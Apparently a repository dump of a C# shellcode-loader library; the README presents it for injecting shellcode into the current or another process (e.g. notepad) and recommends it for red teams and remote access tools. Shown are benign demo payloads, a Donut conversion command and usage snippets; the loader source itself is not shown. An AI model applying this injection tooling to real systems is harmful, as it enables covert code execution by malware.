├── DonutCommand.txt
├── PayloadCSharp
├── App.config
├── EntryPointExe.cs
├── PayloadCSharp.csproj
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── PayloadCSharp.csproj.AssemblyReference.cache
│ ├── PayloadCSharp.csproj.CoreCompileInputs.cache
│ ├── PayloadCSharp.csproj.FileListAbsolute.txt
│ ├── PayloadCSharp.exe
│ └── PayloadCSharp.pdb
│ ├── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── PayloadCSharp.csproj.AssemblyReference.cache
│ ├── PayloadCSharp.csproj.CoreCompileInputs.cache
│ ├── PayloadCSharp.csproj.FileListAbsolute.txt
│ ├── PayloadCSharp.exe
│ └── PayloadCSharp.pdb
│ └── x64
│ └── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── PayloadCSharp.csproj.AssemblyReference.cache
│ ├── PayloadCSharp.csproj.CoreCompileInputs.cache
│ ├── PayloadCSharp.csproj.FileListAbsolute.txt
│ ├── PayloadCSharp.exe
│ └── PayloadCSharp.pdb
├── PayloadCpp
├── PayloadCpp.vcxproj
├── PayloadCpp.vcxproj.filters
├── PayloadCpp.vcxproj.user
├── dllmain.cpp
├── framework.h
├── pch.cpp
└── pch.h
├── PayloadCpp2
├── PayloadCpp2.vcxproj
├── PayloadCpp2.vcxproj.filters
├── PayloadCpp2.vcxproj.user
├── dllmain.cpp
├── framework.h
├── pch.cpp
└── pch.h
├── Payloads
├── Payload2Cpp32.cs
├── Payload2Cpp64.cs
├── PayloadCSharp32.bin
├── PayloadCSharp32.cs
├── PayloadCSharp64.bin
├── PayloadCSharp64.cs
├── PayloadCpp2_32.bin
├── PayloadCpp2_64.bin
├── PayloadCpp32.bin
├── PayloadCpp32.cs
├── PayloadCpp64.bin
└── PayloadCpp64.cs
├── README.md
├── ShellCodeLoader.sln
├── ShellCodeLoader
├── MapView.cs
├── Properties
│ └── AssemblyInfo.cs
├── QueueAPC.cs
├── Shared.cs
├── ShellCodeLoader.cs
├── ShellCodeLoader.csproj
├── ShellCodeLoaderEx.cs
├── ShellCodeLoaderMinimalNativeAPI.cs
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── ShellCodeLoader.csproj.AssemblyReference.cache
│ ├── ShellCodeLoader.csproj.CoreCompileInputs.cache
│ ├── ShellCodeLoader.csproj.FileListAbsolute.txt
│ ├── ShellCodeLoader.dll
│ └── ShellCodeLoader.pdb
│ ├── Release
│ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── ShellCodeLoader.csproj.AssemblyReference.cache
│ ├── ShellCodeLoader.csproj.CoreCompileInputs.cache
│ ├── ShellCodeLoader.csproj.FileListAbsolute.txt
│ ├── ShellCodeLoader.dll
│ └── ShellCodeLoader.pdb
│ └── x64
│ └── Release
│ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── ShellCodeLoader.csproj.AssemblyReference.cache
│ ├── ShellCodeLoader.csproj.CoreCompileInputs.cache
│ ├── ShellCodeLoader.csproj.FileListAbsolute.txt
│ ├── ShellCodeLoader.dll
│ └── ShellCodeLoader.pdb
├── Test
├── App.config
├── Form1.Designer.cs
├── Form1.cs
├── Form1.resx
├── Payload2Cpp32.cs
├── Payload2Cpp64.cs
├── PayloadCSharp32.cs
├── PayloadCSharp64.cs
├── PayloadCpp32.cs
├── PayloadCpp64.cs
├── PayloadD_DLL_32.cs
├── PayloadD_DLL_64.cs
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ ├── Resources.resx
│ ├── Settings.Designer.cs
│ └── Settings.settings
├── Test.csproj
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferences.cache
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Test.Form1.resources
│ ├── Test.Properties.Resources.resources
│ ├── Test.csproj.AssemblyReference.cache
│ ├── Test.csproj.CopyComplete
│ ├── Test.csproj.CoreCompileInputs.cache
│ ├── Test.csproj.FileListAbsolute.txt
│ ├── Test.csproj.GenerateResource.cache
│ ├── Test.exe
│ ├── Test.pdb
│ └── build.force
│ ├── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferences.cache
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Test.Form1.resources
│ ├── Test.Properties.Resources.resources
│ ├── Test.csproj.AssemblyReference.cache
│ ├── Test.csproj.CopyComplete
│ ├── Test.csproj.CoreCompileInputs.cache
│ ├── Test.csproj.FileListAbsolute.txt
│ ├── Test.csproj.GenerateResource.cache
│ ├── Test.exe
│ └── Test.pdb
│ └── x64
│ ├── Debug
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Test.Form1.resources
│ ├── Test.Properties.Resources.resources
│ ├── Test.csproj.AssemblyReference.cache
│ ├── Test.csproj.CopyComplete
│ ├── Test.csproj.CoreCompileInputs.cache
│ ├── Test.csproj.FileListAbsolute.txt
│ ├── Test.csproj.GenerateResource.cache
│ ├── Test.exe
│ └── Test.pdb
│ └── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferences.cache
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Test.Form1.resources
│ ├── Test.Properties.Resources.resources
│ ├── Test.csproj.AssemblyReference.cache
│ ├── Test.csproj.CopyComplete
│ ├── Test.csproj.CoreCompileInputs.cache
│ ├── Test.csproj.FileListAbsolute.txt
│ ├── Test.csproj.GenerateResource.cache
│ ├── Test.exe
│ └── Test.pdb
└── donut.exe
/DonutCommand.txt:
--------------------------------------------------------------------------------
1 | donut.exe %Path_to_your_exe_or_dll_file%
--------------------------------------------------------------------------------
/PayloadCSharp/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PayloadCSharp/EntryPointExe.cs:
--------------------------------------------------------------------------------
1 | using System.Windows.Forms;
2 |
3 | namespace PayloadCSharp
4 | {
5 | public class EntryPointExe
6 | {
7 | public static void Main()
8 | {
9 | MessageBox.Show("Hello from CSharp exe !");
10 | }
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/PayloadCSharp/PayloadCSharp.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {485173CC-FE2B-423B-81F6-EC812DBD6DF3}
8 | Exe
9 | PayloadCSharp
10 | PayloadCSharp
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 | true
36 | bin\x64\Debug\
37 | DEBUG;TRACE
38 | full
39 | x64
40 | 7.3
41 | prompt
42 | true
43 |
44 |
45 | bin\x64\Release\
46 | TRACE
47 | true
48 | pdbonly
49 | x64
50 | 7.3
51 | prompt
52 | true
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | f28cb18b6464b65741bdd61cdf8994c9416493a7
2 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe.config
2 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe
3 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.pdb
4 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.csproj.CoreCompileInputs.cache
5 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.exe
6 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.pdb
7 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/PayloadCSharp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Debug/PayloadCSharp.exe
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Debug/PayloadCSharp.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Debug/PayloadCSharp.pdb
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/PayloadCSharp.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8e5a8bddc2ba0722d0b871bfe18a93ffdc85034a
2 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/PayloadCSharp.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Release\PayloadCSharp.exe.config
2 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Release\PayloadCSharp.exe
3 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Release\PayloadCSharp.pdb
4 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Release\PayloadCSharp.csproj.AssemblyReference.cache
5 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Release\PayloadCSharp.csproj.CoreCompileInputs.cache
6 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Release\PayloadCSharp.exe
7 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Release\PayloadCSharp.pdb
8 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/PayloadCSharp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Release/PayloadCSharp.exe
--------------------------------------------------------------------------------
/PayloadCSharp/obj/Release/PayloadCSharp.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/Release/PayloadCSharp.pdb
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 4ac07ee811ddf06ee427bd3a363f424876ee1d03
2 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\x64\Release\PayloadCSharp.exe.config
2 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\x64\Release\PayloadCSharp.exe
3 | F:\Personal\ShellCodeLoader\PayloadCSharp\bin\x64\Release\PayloadCSharp.pdb
4 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.CoreCompileInputs.cache
5 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.exe
6 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.pdb
7 | F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.AssemblyReference.cache
8 |
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/PayloadCSharp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/x64/Release/PayloadCSharp.exe
--------------------------------------------------------------------------------
/PayloadCSharp/obj/x64/Release/PayloadCSharp.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/PayloadCSharp/obj/x64/Release/PayloadCSharp.pdb
--------------------------------------------------------------------------------
/PayloadCpp/PayloadCpp.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {05027976-cac5-447f-84b6-77f38af2566c}
25 | PayloadCpp
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;PAYLOADCPP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
90 | true
91 | Use
92 | pch.h
93 |
94 |
95 | Windows
96 | true
97 | false
98 |
99 |
100 |
101 |
102 | Level3
103 | true
104 | true
105 | true
106 | WIN32;NDEBUG;PAYLOADCPP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
107 | true
108 | Use
109 | pch.h
110 |
111 |
112 | Windows
113 | true
114 | true
115 | true
116 | false
117 |
118 |
119 |
120 |
121 | Level3
122 | true
123 | _DEBUG;PAYLOADCPP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
124 | true
125 | Use
126 | pch.h
127 |
128 |
129 | Windows
130 | true
131 | false
132 |
133 |
134 |
135 |
136 | Level3
137 | true
138 | true
139 | true
140 | NDEBUG;PAYLOADCPP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
141 | true
142 | Use
143 | pch.h
144 |
145 |
146 | Windows
147 | true
148 | true
149 | true
150 | false
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 | Create
161 | Create
162 | Create
163 | Create
164 |
165 |
166 |
167 |
168 |
169 |
--------------------------------------------------------------------------------
/PayloadCpp/PayloadCpp.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Fichiers d%27en-tête
20 |
21 |
22 | Fichiers d%27en-tête
23 |
24 |
25 |
26 |
27 | Fichiers sources
28 |
29 |
30 | Fichiers sources
31 |
32 |
33 |
--------------------------------------------------------------------------------
/PayloadCpp/PayloadCpp.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/PayloadCpp/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Définit le point d'entrée de l'application DLL.
2 | #include "pch.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | MessageBoxA(NULL, "This is Cpp dll !", "HELLO", 0);
13 | case DLL_THREAD_ATTACH:
14 | case DLL_THREAD_DETACH:
15 | case DLL_PROCESS_DETACH:
16 | break;
17 | }
18 | return TRUE;
19 | }
20 |
21 |
--------------------------------------------------------------------------------
/PayloadCpp/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclure les en-têtes Windows rarement utilisés
4 | // Fichiers d'en-tête Windows
5 | #include
6 |
--------------------------------------------------------------------------------
/PayloadCpp/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp : fichier source correspondant à l'en-tête précompilé
2 |
3 | #include "pch.h"
4 |
5 | // Quand vous utilisez des en-têtes précompilés, ce fichier source est nécessaire pour la réussite de la compilation.
6 |
--------------------------------------------------------------------------------
/PayloadCpp/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h : Il s'agit d'un fichier d'en-tête précompilé.
2 | // Les fichiers listés ci-dessous sont compilés une seule fois, ce qui améliore les performances de génération des futures builds.
3 | // Cela affecte également les performances d'IntelliSense, notamment la complétion du code et de nombreuses fonctionnalités de navigation du code.
4 | // Toutefois, les fichiers listés ici sont TOUS recompilés si l'un d'entre eux est mis à jour entre les builds.
5 | // N'ajoutez pas de fichiers fréquemment mis à jour ici, car cela annule les gains de performance.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // ajouter les en-têtes à précompiler ici
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/PayloadCpp2/PayloadCpp2.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b37b4ebe-e126-4c34-9a1b-1526697c2c25}
25 | PayloadCpp2
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;PAYLOADCPP2_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
90 | true
91 | Use
92 | pch.h
93 |
94 |
95 | Windows
96 | true
97 | false
98 |
99 |
100 |
101 |
102 | Level3
103 | true
104 | true
105 | true
106 | WIN32;NDEBUG;PAYLOADCPP2_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
107 | true
108 | Use
109 | pch.h
110 |
111 |
112 | Windows
113 | true
114 | true
115 | true
116 | false
117 |
118 |
119 |
120 |
121 | Level3
122 | true
123 | _DEBUG;PAYLOADCPP2_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
124 | true
125 | Use
126 | pch.h
127 |
128 |
129 | Windows
130 | true
131 | false
132 |
133 |
134 |
135 |
136 | Level3
137 | true
138 | true
139 | true
140 | NDEBUG;PAYLOADCPP2_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
141 | true
142 | Use
143 | pch.h
144 |
145 |
146 | Windows
147 | true
148 | true
149 | true
150 | false
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 | Create
161 | Create
162 | Create
163 | Create
164 |
165 |
166 |
167 |
168 |
169 |
--------------------------------------------------------------------------------
/PayloadCpp2/PayloadCpp2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Fichiers d%27en-tête
20 |
21 |
22 | Fichiers d%27en-tête
23 |
24 |
25 |
26 |
27 | Fichiers sources
28 |
29 |
30 | Fichiers sources
31 |
32 |
33 |
--------------------------------------------------------------------------------
/PayloadCpp2/PayloadCpp2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/PayloadCpp2/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Définit le point d'entrée de l'application DLL.
2 | #include "pch.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | FatalAppExitW(0, L"Fatal Crash !");
13 | case DLL_THREAD_ATTACH:
14 | case DLL_THREAD_DETACH:
15 | case DLL_PROCESS_DETACH:
16 | break;
17 | }
18 | return TRUE;
19 | }
20 |
21 |
--------------------------------------------------------------------------------
/PayloadCpp2/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclure les en-têtes Windows rarement utilisés
4 | // Fichiers d'en-tête Windows
5 | #include
6 |
--------------------------------------------------------------------------------
/PayloadCpp2/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp : fichier source correspondant à l'en-tête précompilé
2 |
3 | #include "pch.h"
4 |
5 | // Quand vous utilisez des en-têtes précompilés, ce fichier source est nécessaire pour la réussite de la compilation.
6 |
--------------------------------------------------------------------------------
/PayloadCpp2/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h : Il s'agit d'un fichier d'en-tête précompilé.
2 | // Les fichiers listés ci-dessous sont compilés une seule fois, ce qui améliore les performances de génération des futures builds.
3 | // Cela affecte également les performances d'IntelliSense, notamment la complétion du code et de nombreuses fonctionnalités de navigation du code.
4 | // Toutefois, les fichiers listés ici sont TOUS recompilés si l'un d'entre eux est mis à jour entre les builds.
5 | // N'ajoutez pas de fichiers fréquemment mis à jour ici, car cela annule les gains de performance.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // ajouter les en-têtes à précompiler ici
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/Payloads/PayloadCSharp32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCSharp32.bin
--------------------------------------------------------------------------------
/Payloads/PayloadCSharp64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCSharp64.bin
--------------------------------------------------------------------------------
/Payloads/PayloadCpp2_32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCpp2_32.bin
--------------------------------------------------------------------------------
/Payloads/PayloadCpp2_64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCpp2_64.bin
--------------------------------------------------------------------------------
/Payloads/PayloadCpp32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCpp32.bin
--------------------------------------------------------------------------------
/Payloads/PayloadCpp64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Payloads/PayloadCpp64.bin
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ShellCodeLoader
2 | A small shellcode loader library written in C#.
3 |
4 | This small library allows you to inject shellcode in memory of current launched file or any other processes using different techniques.
5 | Useful to use as red team or in a remote access tool. Works for 32 & 64 bit shellcode.
6 |
7 | Note :
8 | * has been tested on same process and notepad as target
9 |
10 | I added some test payloads which I've converted with
11 | * First with : Donut (https://github.com/TheWover/donut) : turns my payload into raw shellcode
12 | * Second with HxD Editor (https://mh-nexus.de/en/downloads.php?product=HxD20) : gives me an array of raw bytes from payloads converted with Donut
13 |
14 | How to use it ?
15 |
16 | For same process:
17 |
18 | ```
19 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
20 | cpp.LoadWithKernel32();//can be LoadWithNTDelegates , LoadWithKernel32Delegates or LoadWithNT
21 | cpp.Dispose();
22 | ```
23 | For other processes:
24 |
25 | ```
26 | Process Target = Process.GetProcessesByName("notepad")[0];
27 | ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
28 | cpp.LoadWithKernel32();//or cpp.LoadWithNT();
29 | cpp.Dispose();
30 | ```
31 |
32 | MapView:
33 |
34 | ```
35 | ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(PayloadCpp64.rawData);
36 | cpp.LoadWithNtMapView();
37 | cpp.Dispose();
38 | ```
39 |
40 | MapView with target:
41 |
